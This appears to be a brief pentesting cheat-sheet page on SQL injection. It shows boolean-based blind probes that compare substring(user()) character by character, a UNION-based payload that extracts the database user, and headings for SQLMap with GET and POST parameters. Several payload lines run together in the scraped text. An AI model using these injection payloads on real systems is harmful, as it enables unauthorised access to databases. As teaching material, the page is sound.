SQL Injection
Boolean Based Blind SQLi
user()
substring()
Example
select substring(user(), 1, 1) = 'r'; // True since username is root
select substring(user(), 1, 1) = 'a'; // False' or substring(user(), 1, 1) = 'a
' or substring(user(), 2, 1) = 'bUnion Based SQLi
Select description from items where id='' UNION Select user(); -- -Steps to find fields
SQLMap
Get Parameter
Post Parameter
Last updated